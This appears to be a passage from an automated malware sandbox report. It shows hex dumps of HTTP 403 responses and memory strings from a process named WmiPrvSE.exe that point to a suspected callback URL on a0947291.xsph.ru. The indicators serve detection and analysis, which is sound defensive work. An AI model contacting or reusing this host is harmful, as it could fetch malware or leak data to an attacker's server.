2d 73 65 72 69 66 3b 66 6f 6e 74 2d 73 74 79 6c 65 3a 6e 6f 72 6d 61 6c 3b 66 6f 6e 74 2d 77 65 69 67 68 74 3a 34 30 30 7d 2e 77 72 61 70 70 65 72 2c 2e 77 72 61 70 70 65 72 20 2e 63 6f 6e 74 65 6e 74 7b 77 69 64 74 68 3a 31 30 30 25 3b 64 69 73 70 6c 61 79 3a 2d 77 65 62 6b 69 74 2d 62 6f 78 3b 64 69 73 70 6c 61 79 3a 2d 77 65 62 6b 69 74 2d 66 6c 65 78 3b 64 69 73 70 6c 61 79 3a 2d 6d 6f 7a 2d 62 6f 78 3b 64 69 73 70 6c 61 79 3a 2d 6d 73 2d 66 6c 65 78 62 6f 78 3b 64 69 73 70 6c 61 79 3a 66 6c 65 78 3b 2d 77 65 62 6b 69 74 2d 62 6f 78 2d 70 61 63 6b 3a 63 65 6e 74 65 72 3b 2d 77 65 62 6b 69 74 2d 6a 75 73 74 69 66 79 2d 63 6f 6e 74 65 6e 74 3a 63 65 6e 74 65 72 3b 2d 6d 6f 7a 2d 62 6f 78 2d 70 61 63 6b 3a 63 65 6e 74 65 72 3b 2d 6d 73 2d 66 6c 65 78 2d 70 61 63 6b 3a 63 65 6e 74 65 72 3b 6a 75 73 74 69 66 79 2d 63 6f 6e 74 65 6e 74 3a 63 65 6e 74 65 72 7d 2e 77 72 61 70 70 65 72 20 2e 63 6f 6e 74 65 6e 74 7b 77 69 64 74 68 3a 69 6e 68 65 72 69 74 3b 6d 61 78 2d 77 69 64 74 68 3a 31 30 33 32 70 78 3b 68 65 69 67 68 74 3a 31 30 30 25 3b 2d 77 65 62 6b 69 74 2d 62 6f 78 2d 6f 72 69 65 6e 74 3a 68 6f 72 69 7a 6f 6e 74 61 6c 3b 2d 77 65 62 6b 69 74 2d 62 6f 78 2d 64 69 72 65 63 74 69 6f 6e 3a 6e 6f 72 6d 61 6c 3b 2d 77 65 62 6b 69 74 2d 66 6c 65 78 2d 64 69 72 65 63 74 69 6f 6e 3a 72 6f 77 3b 2d 6d 6f 7a 2d 62 6f 78 2d 6f 72 69 65 6e 74 3a 68 6f 72 69 7a 6f 6e 74 61 6c 3b 2d 6d 6f 7a 2d 62 6f 78 2d 64 69 72 65 63 74 69 6f 6e 3a 6e 6f 72 6d 61 6c 3b 2d 6d 73 2d 66 6c 65 78 2d 64 69 72 65 63 74 69 6f 6e 3a 72 6f 77 3b 66 6c 65 78 2d 64 69 72 65 63 74 69 6f 6e 3a 72 6f 77 3b 70 61 64 64 69 6e 67 3a 31 32 38 70 78 20 31 36 70 78 20 30 3b 6d 69 6e 2d 68 65 69 67 68 74 3a 2d 6d 6f 7a 2d 63 61 6c 63 28 31 30 30 76 68 20 2d 20 31 32 38 70 78 29 3b 6d 69 6e 2d 68 65 69 67 68 74 3a 63 61 6c 63 28 31 30 30 76 68 20 2d 20 31 32 38 70 78 29 3b 2d 77 65 62 6b 69 74 2d 62 6f 78 2d 73 69 7a 69 6e 67 3a 63 6f 6e 74 65 6e 74 2d 62 6f 78 3b 2d 6d 6f 7a 2d 62 6f 78 2d 73 69 7a 69 6e 67 3a 63 6f 6e 74 65 6e 74 2d 62 6f 78 3b 62 6f 78 2d 73 69 7a 69
            Source: global trafficHTTP traffic detected: HTTP/1.1 403 ForbiddenServer: openrestyDate: Thu, 25 Apr 2024 08:20:15 GMTContent-Type: text/htmlTransfer-Encoding: chunkedConnection: keep-aliveVary: Accept-EncodingData Raw: 64 66 62 65 0d 0a 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 6c 61 6e 67 3d 22 65 6e 22 3e 0a 3c 68 65 61 64 3e 0a 20 20 20 20 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 22 55 54 46 2d 38 22 3e 0a 20 20 20 20 3c 74 69 74 6c 65 3e d0 9e d1 88 d0 b8 d0 b1 d0 ba d0 b0 20 34 30 33 30 3c 2f 74 69 74 6c 65 3e 0a 20 20 20 20 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 76 69 65 77 70 6f 72 74 22 20 63 6f 6e 74 65 6e 74 3d 22 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 2c 20 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 2e 30 22 3e 0a 20 20 20 20 3c 73 74 79 6c 65 3e 0a 62 6f 64 79 2c 68 31 2c 70 7b 70 61 64 64 69 6e 67 3a 30 3b 6d 61 72 67 69 6e 3a 30 7d 2a 7b 66 6f 6e 74 2d 66 61 6d 69 6c 79 3a 41 72 69 61 6c 2c 73 61 6e 73 2d 73 65 72 69 66 3b 66 6f 6e 74 2d 73 74 79 6c 65 3a 6e 6f 72 6d 61 6c 3b 66 6f 6e 74 2d 77 65 69 67 68 74 3a 34 30 30 7d 2e 77 72 61 70 70 65 72 2c 2e 77 72 61 70 70 65 72 20 2e 63 6f 6e 74 65 6e 74 7b 77 69 64 74 68 3a 31 30 30 25 3b 64 69 73 70 6c 61 79 3a 2d 77 65 62 6b 69 74 2d 62 6f 78 3b 64 69 73 70 6c 61 79 3a 2d 77 65 62 6b 69 74 2d 66 6c 65 78 3b 64 69 73 70 6c 61 79 3a 2d 6d 6f 7a 2d 62 6f 78 3b 64 69 73 70 6c 61 79 3a 2d 6d 73 2d 66 6c 65 78 62 6f 78 3b 64 69 73 70 6c 61 79 3a 66 6c 65 78 3b 2d 77 65 62 6b 69 74 2d 62 6f 78 2d 70 61 63 6b 3a 63 65 6e 74 65 72 3b 2d 77 65 62 6b 69 74 2d 6a 75 73 74 69 66 79 2d 63 6f 6e 74 65 6e 74 3a 63 65 6e 74 65 72 3b 2d 6d 6f 7a 2d 62 6f 78 2d 70 61 63 6b 3a 63 65 6e 74 65 72 3b 2d 6d 73 2d 66 6c 65 78 2d 70 61 63 6b 3a 63 65 6e 74 65 72 3b 6a 75 73 74 69 66 79 2d 63 6f 6e 74 65 6e 74 3a 63 65 6e 74 65 72 7d 2e 77 72 61 70 70 65 72 20 2e 63 6f 6e 74 65 6e 74 7b 77 69 64 74 68 3a 69 6e 68 65 72 69 74 3b 6d 61 78 2d 77 69 64 74 68 3a 31 30 33 32 70 78 3b 68 65 69 67 68 74 3a 31 30 30 25 3b 2d 77 65 62 6b 69 74 2d 62 6f 78 2d 6f 72 69 65 6e 74 3a 68 6f 72 69 7a 6f 6e 74 61 6c 3b 2d 77 65 62 6b 69 74 2d 62 6f 78 2d 64 69 72 65 63 74 69 6f 6e 3a 6e 6f 72 6d 61 6c 3b 2d 77 65 62 6b 69 74 2d 66 6c 65 78 2d 64 69 72 65 63 74 69 6f 6e 3a 72 6f 77 3b 2d 6d 6f 7a 2d 62 6f 78 2d 6f 72 69 65 6e 74 3a 68 6f 72 69 7a 6f 6e 74 61 6c 3b 2d 6d 6f 7a 2d 62 6f 78 2d 64 69 72 65 63 74 69 6f 6e 3a 6e 6f 72 6d 61 6c 3b 2d 6d 73 2d 66 6c 65 78 2d 64 69 72 65 63 74 69 6f 6e 3a 72 6f 77 3b 66 6c 65 78 2d 64 69 72 65 63 74 69 6f 6e 3a 72 6f 77 3b 70 61 64 64 69 6e 67 3a 31 32 38 70 78 20 31 36 70 78 20 30 3b 6d 69 6e 2d 68 65 69 67 68 74 3a 2d 6d 6f 7a 2d 63 61 6c 63 28 31 30 30 76 68 20 2d 20 31 32 38 70 78 29 3b 6d 69 6e 2d 68 65 69 67 68 74 3a 63 61 6c 63 28 31 30 30 76 68 20 2d 20 31 32 38 70 78 29 3b 2d 77 65 62 6b 69 74 2d 62 6f 78 2d 73 69 7a 69 6e 67 3a 63 6f 6e 74 65 6e 74 2d 62 6f 78 3b 2d 6d 6f 7a 2d 62 6f 78 2d 73 69 7a 69 6e 67 3a 63 6f 6e 74 65 6e 74 2d 62 6f 78 3b 62 6f 78 2d 73 69 7a 69
            Source: global trafficHTTP traffic detected: HTTP/1.1 403 ForbiddenServer: openrestyDate: Thu, 25 Apr 2024 08:20:46 GMTContent-Type: text/htmlTransfer-Encoding: chunkedConnection: keep-aliveVary: Accept-EncodingData Raw: 64 66 62 65 0d 0a 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 6c 61 6e 67 3d 22 65 6e 22 3e 0a 3c 68 65 61 64 3e 0a 20 20 20 20 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 22 55 54 46 2d 38 22 3e 0a 20 20 20 20 3c 74 69 74 6c 65 3e d0 9e d1 88 d0 b8 d0 b1 d0 ba d0 b0 20 34 30 33 30 3c 2f 74 69 74 6c 65 3e 0a 20 20 20 20 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 76 69 65 77 70 6f 72 74 22 20 63 6f 6e 74 65 6e 74 3d 22 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 2c 20 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 2e 30 22 3e 0a 20 20 20 20 3c 73 74 79 6c 65 3e 0a 62 6f 64 79 2c 68 31 2c 70 7b 70 61 64 64 69 6e 67 3a 30 3b 6d 61 72 67 69 6e 3a 30 7d 2a 7b 66 6f 6e 74 2d 66 61 6d 69 6c 79 3a 41 72 69 61 6c 2c 73 61 6e 73 2d 73 65 72 69 66 3b 66 6f 6e 74 2d 73 74 79 6c 65 3a 6e 6f 72 6d 61 6c 3b 66 6f 6e 74 2d 77 65 69 67 68 74 3a 34 30 30 7d 2e 77 72 61 70 70 65 72 2c 2e 77 72 61 70 70 65 72 20 2e 63 6f 6e 74 65 6e 74 7b 77 69 64 74 68 3a 31 30 30 25 3b 64 69 73 70 6c 61 79 3a 2d 77 65 62 6b 69 74 2d 62 6f 78 3b 64 69 73 70 6c 61 79 3a 2d 77 65 62 6b 69 74 2d 66 6c 65 78 3b 64 69 73 70 6c 61 79 3a 2d 6d 6f 7a 2d 62 6f 78 3b 64 69 73 70 6c 61 79 3a 2d 6d 73 2d 66 6c 65 78 62 6f 78 3b 64 69 73 70 6c 61 79 3a 66 6c 65 78 3b 2d 77 65 62 6b 69 74 2d 62 6f 78 2d 70 61 63 6b 3a 63 65 6e 74 65 72 3b 2d 77 65 62 6b 69 74 2d 6a 75 73 74 69 66 79 2d 63 6f 6e 74 65 6e 74 3a 63 65 6e 74 65 72 3b 2d 6d 6f 7a 2d 62 6f 78 2d 70 61 63 6b 3a 63 65 6e 74 65 72 3b 2d 6d 73 2d 66 6c 65 78 2d 70 61 63 6b 3a 63 65 6e 74 65 72 3b 6a 75 73 74 69 66 79 2d 63 6f 6e 74 65 6e 74 3a 63 65 6e 74 65 72 7d 2e 77 72 61 70 70 65 72 20 2e 63 6f 6e 74 65 6e 74 7b 77 69 64 74 68 3a 69 6e 68 65 72 69 74 3b 6d 61 78 2d 77 69 64 74 68 3a 31 30 33 32 70 78 3b 68 65 69 67 68 74 3a 31 30 30 25 3b 2d 77 65 62 6b 69 74 2d 62 6f 78 2d 6f 72 69 65 6e 74 3a 68 6f 72 69 7a 6f 6e 74 61 6c 3b 2d 77 65 62 6b 69 74 2d 62 6f 78 2d 64 69 72 65 63 74 69 6f 6e 3a 6e 6f 72 6d 61 6c 3b 2d 77 65 62 6b 69 74 2d 66 6c 65 78 2d 64 69 72 65 63 74 69 6f 6e 3a 72 6f 77 3b 2d 6d 6f 7a 2d 62 6f 78 2d 6f 72 69 65 6e 74 3a 68 6f 72 69 7a 6f 6e 74 61 6c 3b 2d 6d 6f 7a 2d 62 6f 78 2d 64 69 72 65 63 74 69 6f 6e 3a 6e 6f 72 6d 61 6c 3b 2d 6d 73 2d 66 6c 65 78 2d 64 69 72 65 63 74 69 6f 6e 3a 72 6f 77 3b 66 6c 65 78 2d 64 69 72 65 63 74 69 6f 6e 3a 72 6f 77 3b 70 61 64 64 69 6e 67 3a 31 32 38 70 78 20 31 36 70 78 20 30 3b 6d 69 6e 2d 68 65 69 67 68 74 3a 2d 6d 6f 7a 2d 63 61 6c 63 28 31 30 30 76 68 20 2d 20 31 32 38 70 78 29 3b 6d 69 6e 2d 68 65 69 67 68 74 3a 63 61 6c 63 28 31 30 30 76 68 20 2d 20 31 32 38 70 78 29 3b 2d 77 65 62 6b 69 74 2d 62 6f 78 2d 73 69 7a 69 6e 67 3a 63 6f 6e 74 65 6e 74 2d 62 6f 78 3b 2d 6d 6f 7a 2d 62 6f 78 2d 73 69 7a 69 6e 67 3a 63 6f 6e 74 65 6e 74 2d 62 6f 78 3b 62 6f 78 2d 73 69 7a 69
            Source: global trafficHTTP traffic detected: HTTP/1.1 403 ForbiddenServer: openrestyDate: Thu, 25 Apr 2024 08:20:47 GMTContent-Type: text/htmlTransfer-Encoding: chunkedConnection: keep-aliveVary: Accept-EncodingData Raw: 64 66 62 65 0d 0a 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 6c 61 6e 67 3d 22 65 6e 22 3e 0a 3c 68 65 61 64 3e 0a 20 20 20 20 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 22 55 54 46 2d 38 22 3e 0a 20 20 20 20 3c 74 69 74 6c 65 3e d0 9e d1 88 d0 b8 d0 b1 d0 ba d0 b0 20 34 30 33 30 3c 2f 74 69 74 6c 65 3e 0a 20 20 20 20 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 76 69 65 77 70 6f 72 74 22 20 63 6f 6e 74 65 6e 74 3d 22 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 2c 20 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 2e 30 22 3e 0a 20 20 20 20 3c 73 74 79 6c 65 3e 0a 62 6f 64 79 2c 68 31 2c 70 7b 70 61 64 64 69 6e 67 3a 30 3b 6d 61 72 67 69 6e 3a 30 7d 2a 7b 66 6f 6e 74 2d 66 61 6d 69 6c 79 3a 41 72 69 61 6c 2c 73 61 6e 73 2d 73 65 72 69 66 3b 66 6f 6e 74 2d 73 74 79 6c 65 3a 6e 6f 72 6d 61 6c 3b 66 6f 6e 74 2d 77 65 69 67 68 74 3a 34 30 30 7d 2e 77 72 61 70 70 65 72 2c 2e 77 72 61 70 70 65 72 20 2e 63 6f 6e 74 65 6e 74 7b 77 69 64 74 68 3a 31 30 30 25 3b 64 69 73 70 6c 61 79 3a 2d 77 65 62 6b 69 74 2d 62 6f 78 3b 64 69 73 70 6c 61 79 3a 2d 77 65 62 6b 69 74 2d 66 6c 65 78 3b 64 69 73 70 6c 61 79 3a 2d 6d 6f 7a 2d 62 6f 78 3b 64 69 73 70 6c 61 79 3a 2d 6d 73 2d 66 6c 65 78 62 6f 78 3b 64 69 73 70 6c 61 79 3a 66 6c 65 78 3b 2d 77 65 62 6b 69 74 2d 62 6f 78 2d 70 61 63 6b 3a 63 65 6e 74 65 72 3b 2d 77 65 62 6b 69 74 2d 6a 75 73 74 69 66 79 2d 63 6f 6e 74 65 6e 74 3a 63 65 6e 74 65 72 3b 2d 6d 6f 7a 2d 62 6f 78 2d 70 61 63 6b 3a 63 65 6e 74 65 72 3b 2d 6d 73 2d 66 6c 65 78 2d 70 61 63 6b 3a 63 65 6e 74 65 72 3b 6a 75 73 74 69 66 79 2d 63 6f 6e 74 65 6e 74 3a 63 65 6e 74 65 72 7d 2e 77 72 61 70 70 65 72 20 2e 63 6f 6e 74 65 6e 74 7b 77 69 64 74 68 3a 69 6e 68 65 72 69 74 3b 6d 61 78 2d 77 69 64 74 68 3a 31 30 33 32 70 78 3b 68 65 69 67 68 74 3a 31 30 30 25 3b 2d 77 65 62 6b 69 74 2d 62 6f 78 2d 6f 72 69 65 6e 74 3a 68 6f 72 69 7a 6f 6e 74 61 6c 3b 2d 77 65 62 6b 69 74 2d 62 6f 78 2d 64 69 72 65 63 74 69 6f 6e 3a 6e 6f 72 6d 61 6c 3b 2d 77 65 62 6b 69 74 2d 66 6c 65 78 2d 64 69 72 65 63 74 69 6f 6e 3a 72 6f 77 3b 2d 6d 6f 7a 2d 62 6f 78 2d 6f 72 69 65 6e 74 3a 68 6f 72 69 7a 6f 6e 74 61 6c 3b 2d 6d 6f 7a 2d 62 6f 78 2d 64 69 72 65 63 74 69 6f 6e 3a 6e 6f 72 6d 61 6c 3b 2d 6d 73 2d 66 6c 65 78 2d 64 69 72 65 63 74 69 6f 6e 3a 72 6f 77 3b 66 6c 65 78 2d 64 69 72 65 63 74 69 6f 6e 3a 72 6f 77 3b 70 61 64 64 69 6e 67 3a 31 32 38 70 78 20 31 36 70 78 20 30 3b 6d 69 6e 2d 68 65 69 67 68 74 3a 2d 6d 6f 7a 2d 63 61 6c 63 28 31 30 30 76 68 20 2d 20 31 32 38 70 78 29 3b 6d 69 6e 2d 68 65 69 67 68 74 3a 63 61 6c 63 28 31 30 30 76 68 20 2d 20 31 32 38 70 78 29 3b 2d 77 65 62 6b 69 74 2d 62 6f 78 2d 73 69 7a 69 6e 67 3a 63 6f 6e 74 65 6e 74 2d 62 6f 78 3b 2d 6d 6f 7a 2d 62 6f 78 2d 73 69 7a 69 6e 67 3a 63 6f 6e 74 65 6e 74 2d 62 6f 78 3b 62 6f 78 2d 73 69 7a 69
            Source: global trafficHTTP traffic detected: HTTP/1.1 403 ForbiddenServer: openrestyDate: Thu, 25 Apr 2024 08:21:02 GMTContent-Type: text/htmlTransfer-Encoding: chunkedConnection: keep-aliveVary: Accept-EncodingData Raw: 64 66 62 65 0d 0a 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 6c 61 6e 67 3d 22 65 6e 22 3e 0a 3c 68 65 61 64 3e 0a 20 20 20 20 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 22 55 54 46 2d 38 22 3e 0a 20 20 20 20 3c 74 69 74 6c 65 3e d0 9e d1 88 d0 b8 d0 b1 d0 ba d0 b0 20 34 30 33 30 3c 2f 74 69 74 6c 65 3e 0a 20 20 20 20 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 76 69 65 77 70 6f 72 74 22 20 63 6f 6e 74 65 6e 74 3d 22 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 2c 20 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 2e 30 22 3e 0a 20 20 20 20 3c 73 74 79 6c 65 3e 0a 62 6f 64 79 2c 68 31 2c 70 7b 70 61 64 64 69 6e 67 3a 30 3b 6d 61 72 67 69 6e 3a 30 7d 2a 7b 66 6f 6e 74 2d 66 61 6d 69 6c 79 3a 41 72 69 61 6c 2c 73 61 6e 73 2d 73 65 72 69 66 3b 66 6f 6e 74 2d 73 74 79 6c 65 3a 6e 6f 72 6d 61 6c 3b 66 6f 6e 74 2d 77 65 69 67 68 74 3a 34 30 30 7d 2e 77 72 61 70 70 65 72 2c 2e 77 72 61 70 70 65 72 20 2e 63 6f 6e 74 65 6e 74 7b 77 69 64 74 68 3a 31 30 30 25 3b 64 69 73 70 6c 61 79 3a 2d 77 65 62 6b 69 74 2d 62 6f 78 3b 64 69 73 70 6c 61 79 3a 2d 77 65 62 6b 69 74 2d 66 6c 65 78 3b 64 69 73 70 6c 61 79 3a 2d 6d 6f 7a 2d 62 6f 78 3b 64 69 73 70 6c 61 79 3a 2d 6d 73 2d 66 6c 65 78 62 6f 78 3b 64 69 73 70 6c 61 79 3a 66 6c 65 78 3b 2d 77 65 62 6b 69 74 2d 62 6f 78 2d 70 61 63 6b 3a 63 65 6e 74 65 72 3b 2d 77 65 62 6b 69 74 2d 6a 75 73 74 69 66 79 2d 63 6f 6e 74 65 6e 74 3a 63 65 6e 74 65 72 3b 2d 6d 6f 7a 2d 62 6f 78 2d 70 61 63 6b 3a 63 65 6e 74 65 72 3b 2d 6d 73 2d 66 6c 65 78 2d 70 61 63 6b 3a 63 65 6e 74 65 72 3b 6a 75 73 74 69 66 79 2d 63 6f 6e 74 65 6e 74 3a 63 65 6e 74 65 72 7d 2e 77 72 61 70 70 65 72 20 2e 63 6f 6e 74 65 6e 74 7b 77 69 64 74 68 3a 69 6e 68 65 72 69 74 3b 6d 61 78 2d 77 69 64 74 68 3a 31 30 33 32 70 78 3b 68 65 69 67 68 74 3a 31 30 30 25 3b 2d 77 65 62 6b 69 74 2d 62 6f 78 2d 6f 72 69 65 6e 74 3a 68 6f 72 69 7a 6f 6e 74 61 6c 3b 2d 77 65 62 6b 69 74 2d 62 6f 78 2d 64 69 72 65 63 74 69 6f 6e 3a 6e 6f 72 6d 61 6c 3b 2d 77 65 62 6b 69 74 2d 66 6c 65 78 2d 64 69 72 65 63 74 69 6f 6e 3a 72 6f 77 3b 2d 6d 6f 7a 2d 62 6f 78 2d 6f 72 69 65 6e 74 3a 68 6f 72 69 7a 6f 6e 74 61 6c 3b 2d 6d 6f 7a 2d 62 6f 78 2d 64 69 72 65 63 74 69 6f 6e 3a 6e 6f 72 6d 61 6c 3b 2d 6d 73 2d 66 6c 65 78 2d 64 69 72 65 63 74 69 6f 6e 3a 72 6f 77 3b 66 6c 65 78 2d 64 69 72 65 63 74 69 6f 6e 3a 72 6f 77 3b 70 61 64 64 69 6e 67 3a 31 32 38 70 78 20 31 36 70 78 20 30 3b 6d 69 6e 2d 68 65 69 67 68 74 3a 2d 6d 6f 7a 2d 63 61 6c 63 28 31 30 30 76 68 20 2d 20 31 32 38 70 78 29 3b 6d 69 6e 2d 68 65 69 67 68 74 3a 63 61 6c 63 28 31 30 30 76 68 20 2d 20 31 32 38 70 78 29 3b 2d 77 65 62 6b 69 74 2d 62 6f 78 2d 73 69 7a 69 6e 67 3a 63 6f 6e 74 65 6e 74 2d 62 6f 78 3b 2d 6d 6f 7a 2d 62 6f 78 2d 73 69 7a 69 6e 67 3a 63 6f 6e 74 65 6e 74 2d 62 6f 78 3b 62 6f 78 2d 73 69 7a 69
            Source: global trafficHTTP traffic detected: HTTP/1.1 403 ForbiddenServer: openrestyDate: Thu, 25 Apr 2024 08:21:03 GMTContent-Type: text/htmlTransfer-Encoding: chunkedConnection: keep-aliveVary: Accept-EncodingData Raw: 64 66 62 65 0d 0a 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 6c 61 6e 67 3d 22 65 6e 22 3e 0a 3c 68 65 61 64 3e 0a 20 20 20 20 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 22 55 54 46 2d 38 22 3e 0a 20 20 20 20 3c 74 69 74 6c 65 3e d0 9e d1 88 d0 b8 d0 b1 d0 ba d0 b0 20 34 30 33 30 3c 2f 74 69 74 6c 65 3e 0a 20 20 20 20 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 76 69 65 77 70 6f 72 74 22 20 63 6f 6e 74 65 6e 74 3d 22 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 2c 20 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 2e 30 22 3e 0a 20 20 20 20 3c 73 74 79 6c 65 3e 0a 62 6f 64 79 2c 68 31 2c 70 7b 70 61 64 64 69 6e 67 3a 30 3b 6d 61 72 67 69 6e 3a 30 7d 2a 7b 66 6f 6e 74 2d 66 61 6d 69 6c 79 3a 41 72 69 61 6c 2c 73 61 6e 73 2d 73 65 72 69 66 3b 66 6f 6e 74 2d 73 74 79 6c 65 3a 6e 6f 72 6d 61 6c 3b 66 6f 6e 74 2d 77 65 69 67 68 74 3a 34 30 30 7d 2e 77 72 61 70 70 65 72 2c 2e 77 72 61 70 70 65 72 20 2e 63 6f 6e 74 65 6e 74 7b 77 69 64 74 68 3a 31 30 30 25 3b 64 69 73 70 6c 61 79 3a 2d 77 65 62 6b 69 74 2d 62 6f 78 3b 64 69 73 70 6c 61 79 3a 2d 77 65 62 6b 69 74 2d 66 6c 65 78 3b 64 69 73 70 6c 61 79 3a 2d 6d 6f 7a 2d 62 6f 78 3b 64 69 73 70 6c 61 79 3a 2d 6d 73 2d 66 6c 65 78 62 6f 78 3b 64 69 73 70 6c 61 79 3a 66 6c 65 78 3b 2d 77 65 62 6b 69 74 2d 62 6f 78 2d 70 61 63 6b 3a 63 65 6e 74 65 72 3b 2d 77 65 62 6b 69 74 2d 6a 75 73 74 69 66 79 2d 63 6f 6e 74 65 6e 74 3a 63 65 6e 74 65 72 3b 2d 6d 6f 7a 2d 62 6f 78 2d 70 61 63 6b 3a 63 65 6e 74 65 72 3b 2d 6d 73 2d 66 6c 65 78 2d 70 61 63 6b 3a 63 65 6e 74 65 72 3b 6a 75 73 74 69 66 79 2d 63 6f 6e 74 65 6e 74 3a 63 65 6e 74 65 72 7d 2e 77 72 61 70 70 65 72 20 2e 63 6f 6e 74 65 6e 74 7b 77 69 64 74 68 3a 69 6e 68 65 72 69 74 3b 6d 61 78 2d 77 69 64 74 68 3a 31 30 33 32 70 78 3b 68 65 69 67 68 74 3a 31 30 30 25 3b 2d 77 65 62 6b 69 74 2d 62 6f 78 2d 6f 72 69 65 6e 74 3a 68 6f 72 69 7a 6f 6e 74 61 6c 3b 2d 77 65 62 6b 69 74 2d 62 6f 78 2d 64 69 72 65 63 74 69 6f 6e 3a 6e 6f 72 6d 61 6c 3b 2d 77 65 62 6b 69 74 2d 66 6c 65 78 2d 64 69 72 65 63 74 69 6f 6e 3a 72 6f 77 3b 2d 6d 6f 7a 2d 62 6f 78 2d 6f 72 69 65 6e 74 3a 68 6f 72 69 7a 6f 6e 74 61 6c 3b 2d 6d 6f 7a 2d 62 6f 78 2d 64 69 72 65 63 74 69 6f 6e 3a 6e 6f 72 6d 61 6c 3b 2d 6d 73 2d 66 6c 65 78 2d 64 69 72 65 63 74 69 6f 6e 3a 72 6f 77 3b 66 6c 65 78 2d 64 69 72 65 63 74 69 6f 6e 3a 72 6f 77 3b 70 61 64 64 69 6e 67 3a 31 32 38 70 78 20 31 36 70 78 20 30 3b 6d 69 6e 2d 68 65 69 67 68 74 3a 2d 6d 6f 7a 2d 63 61 6c 63 28 31 30 30 76 68 20 2d 20 31 32 38 70 78 29 3b 6d 69 6e 2d 68 65 69 67 68 74 3a 63 61 6c 63 28 31 30 30 76 68 20 2d 20 31 32 38 70 78 29 3b 2d 77 65 62 6b 69 74 2d 62 6f 78 2d 73 69 7a 69 6e 67 3a 63 6f 6e 74 65 6e 74 2d 62 6f 78 3b 2d 6d 6f 7a 2d 62 6f 78 2d 73 69 7a 69 6e 67 3a 63 6f 6e 74 65 6e 74 2d 62 6f 78 3b 62 6f 78 2d 73 69 7a 69
            Source: WmiPrvSE.exe, 00000023.00000002.2792046373.0000000003227000.00000004.00000800.00020000.00000000.sdmp, WmiPrvSE.exe, 00000023.00000002.2792046373.0000000003459000.00000004.00000800.00020000.00000000.sdmp, WmiPrvSE.exe, 00000023.00000002.2792046373.0000000003558000.00000004.00000800.00020000.00000000.sdmp, WmiPrvSE.exe, 00000023.00000002.2792046373.0000000002E81000.00000004.00000800.00020000.00000000.sdmp, WmiPrvSE.exe, 00000026.00000002.3182465620.00000000031E2000.00000004.00000800.00020000.00000000.sdmp, WmiPrvSE.exe, 00000026.00000002.3182465620.0000000003443000.00000004.00000800.00020000.00000000.sdmp, WmiPrvSE.exe, 00000026.00000002.3182465620.00000000030A8000.00000004.00000800.00020000.00000000.sdmp, WmiPrvSE.exe, 00000026.00000002.3182465620.0000000003334000.00000004.00000800.00020000.00000000.sdmp, WmiPrvSE.exe, 00000029.00000002.3409082832.0000000002A8E000.00000004.00000800.00020000.00000000.sdmp, WmiPrvSE.exe, 00000029.00000002.3409082832.0000000002BF2000.00000004.00000800.00020000.00000000.sdmp, WmiPrvSE.exe, 00000029.00000002.3409082832.0000000002E02000.00000004.00000800.00020000.00000000.sdmp, WmiPrvSE.exe, 00000029.00000002.3409082832.0000000002DD5000.00000004.00000800.00020000.00000000.sdmp, WmiPrvSE.exe, 0000002C.00000002.3632602400.0000000002959000.00000004.00000800.00020000.00000000.sdmp, WmiPrvSE.exe, 0000002C.00000002.3632602400.0000000002EC3000.00000004.00000800.00020000.00000000.sdmp, WmiPrvSE.exe, 0000002C.00000002.3632602400.0000000002BB1000.00000004.00000800.00020000.00000000.sdmp, WmiPrvSE.exe, 0000002C.00000002.3632602400.0000000002EF0000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://a0947291.xsph.ru
            Source: WmiPrvSE.exe, 0000002C.00000002.3632602400.0000000002959000.00000004.00000800.00020000.00000000.sdmp, WmiPrvSE.exe, 0000002C.00000002.3632602400.0000000002EC3000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://a0947291.xsph.ru/
            Source: WmiPrvSE.exe, 00000026.00000002.3182465620.00000000031E2000.00000004.00000800.00020000.00000000.sdmp, WmiPrvSE.exe, 00000026.00000002.3182465620.00000000030A8000.00000004.00000800.00020000.00000000.sdmp, WmiPrvSE.exe, 00000026.00000002.3182465620.0000000003334000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://a0947291.xsph.ru/1606aca9.php?NmF4dcz1AZPsODb7c4ZJsHpxaH=XN7y&dCgr8zVnf24JM9e1=Ek3Y&HF7ReWWco
            Source: WmiPrvSE.exe, 00000029.00000002.3409082832.0000000002A8E000.00000004.00000800.00020000.00000000.sdmp, WmiPrvSE.exe, 00000029.00000002.3409082832.0000000002BF2000.00000004.00000800.00020000.00000000.sdmp, WmiPrvSE.exe, 00000029.00000002.3409082832.0000000002DD5000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://a0947291.xsph.ru/1606aca9.php?UDHxzzcas1EAv9DMmpw3fnZY=rCOtt0GvVNct1WrGn4NENdapnoSCQPr&79de6a
